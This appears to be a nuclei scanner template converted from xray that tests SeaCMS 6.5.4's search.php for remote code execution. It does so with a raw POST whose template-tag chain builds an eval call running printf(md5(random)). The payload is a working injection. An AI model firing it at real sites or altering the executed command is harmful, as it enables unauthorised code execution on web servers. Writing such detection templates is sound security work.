id: poc-yaml-seacms-6-5-4-search-php-rce

info:
  name: poc-yaml-seacms-6-5-4-search-php-rce
  author: xray-converter
  severity: critical
  tags: xray-converted,rce
  reference:
    - http://0day5.com/archives/4249/
    - https://phyb0x.github.io/2018/10/09/seacms%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E5%88%86%E6%9E%90/

http:
  - raw:
      - |
        POST /search.php HTTP/1.1
        Host: {{Hostname}}

        searchtype=5&searchword={if{searchpage:year}&year=:e{searchpage:area}}&area=v{searchpage:letter}&letter=al{searchpage:lang}&yuyan=(join{searchpage:jq}&jq=($_P{searchpage:ver}&&ver=OST[9]))&9[]=prin&9[]=tf(md5({{rand_int(1000, 9999)}}));

    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200